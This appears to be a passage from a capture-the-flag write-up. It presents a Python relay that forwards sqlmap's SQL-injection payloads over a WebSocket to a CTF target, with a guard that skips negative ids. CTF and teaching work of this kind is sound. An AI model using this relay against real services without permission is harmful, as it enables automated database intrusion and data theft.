Using article-1 I first made sure I understood the code, then reused it. The original code was written for an in-network server, but we needed to reach a remote host over WebSockets, so we changed the scheme from `ws://` to `wss://` (TLS-wrapped WebSocket).
We also need to make sure that negative ids are never transmitted: the target is backed by sqlite3 and, as the code comment notes, it freezes when it is given a negative id.
To do that we apply a simple guard in the code, `if payload.startswith('-'):`, which returns a placeholder message instead of forwarding the payload. Note that this guard should run on the URL-decoded value; checked on the raw query string, an encoded `%2D` prefix would slip past it.
code:
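"""Tiny HTTP -> WebSocket relay so sqlmap can drive a WebSocket-only endpoint.

sqlmap sends ``GET /?id=<payload>`` to this server. The handler unwraps the
payload, wraps it in the JSON message the target expects, forwards it over the
WebSocket and returns the target's reply as the HTTP body so sqlmap can diff
responses as usual. ``wss://`` is used because the target is a remote host.
"""
import json
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse

ws_server = "wss://bountyrepo.ctf.intigriti.io/ws"


def build_message(payload: str) -> str:
    """Return the JSON message carrying one (URL-encoded) sqlmap payload.

    ``json.dumps`` escapes quotes, backslashes and control characters, so the
    decoded payload reaches the target unchanged. The previous ``"`` -> ``'``
    swap silently rewrote every payload that contained a double quote.
    """
    return json.dumps({"employeeID": unquote(payload)}, separators=(",", ":"))


def is_negative_id(payload: str) -> bool:
    """True when the decoded payload starts with ``-``.

    The target freezes on negative employee ids, so those are never forwarded.
    The check is done on the URL-decoded value (ignoring leading whitespace):
    on the raw query string an encoded ``%2D`` prefix would bypass it.
    """
    return unquote(payload).lstrip().startswith("-")


def send_ws(payload: str) -> str:
    """Forward one payload to the WebSocket target and return its reply.

    A fresh connection is opened per call. Returns ``''`` when the target
    answers with an empty frame. Any connection/handshake error propagates to
    the caller.
    """
    # Imported here so the module and its pure helpers load (and can be unit
    # tested) without websocket-client installed; the relay itself needs it.
    from websocket import create_connection

    ws = create_connection(ws_server)
    try:
        # If the target sends a greeting/token on connect, read it here first
        # (e.g. ``resp = ws.recv()``) and extract what the payload needs.
        ws.send(build_message(payload))
        resp = ws.recv()
    finally:
        ws.close()  # also close when send/recv raise; the original leaked it
    if isinstance(resp, bytes):
        # binary frames come back as bytes; the HTTP body is built from str
        resp = resp.decode("utf-8", errors="replace")
    return resp or ""


def middleware_server(host_port, content_type="text/plain"):
    """Serve ``GET /?id=<payload>`` on *host_port* and relay each payload.

    The status code is chosen after the relay attempt: a failed WebSocket
    round-trip yields a 502 with the error text instead of a half-sent 200
    (the original sent the status before calling send_ws, so an exception
    there dropped the connection mid-response).
    """

    class CustomHandler(SimpleHTTPRequestHandler):
        def do_GET(self) -> None:
            query = urlparse(self.path).query
            # Everything after the first '=' is the payload, as before; no
            # '=' (or an empty value) means nothing to forward.
            payload = query.split("=", 1)[1] if "=" in query else ""
            status = 200
            if not payload:
                content = "No parameters specified!"
            elif is_negative_id(payload):
                content = "Skipped due to negative id as it freezes on negative id"
            else:
                try:
                    content = send_ws(payload)
                except Exception as exc:  # boundary: report, don't crash
                    self.log_error("websocket relay failed: %s", exc)
                    status = 502
                    content = f"WebSocket relay failed: {exc}"
            self.send_response(status)
            self.send_header("Content-type", content_type)
            self.end_headers()
            self.wfile.write(content.encode())

    class _TCPServer(TCPServer):
        allow_reuse_address = True

    httpd = _TCPServer(host_port, CustomHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    print("[+] Starting MiddleWare Server")
    print("[+] Send payloads in http://localhost:8081/?id=*")
    try:
        # Loopback only: the relay has no authentication and forwards whatever
        # it is given to the target, so it must not be reachable from the
        # network. Change the address only if sqlmap runs on another host.
        middleware_server(("127.0.0.1", 8081))
    except KeyboardInterrupt:
        pass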
This is our middleware: we point sqlmap at it over plain HTTP, and it forwards each request's payload to the target over the WebSocket and hands the reply back: